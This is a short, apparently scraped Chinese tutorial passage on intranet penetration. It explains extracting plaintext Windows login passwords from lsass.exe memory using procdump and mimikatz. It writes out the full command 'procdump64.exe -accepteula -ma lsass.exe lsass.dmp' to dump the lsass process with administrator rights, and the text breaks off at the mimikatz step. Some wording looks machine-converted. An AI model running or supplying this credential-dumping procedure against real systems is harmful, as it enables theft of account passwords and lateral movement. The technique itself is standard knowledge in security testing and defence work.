内网渗透之mimikatz+procdump 提取 Windows 明文密码

0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登录策略) 中存储的明文登陆密码。html 0x01 操做 Windows10/2012 如下的版本: 一、上传 procdump 执行命令转存出 lsass.dmp 文件(须要管理员权限)shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp 二、拿到 mimik
相关文章
相关标签/搜索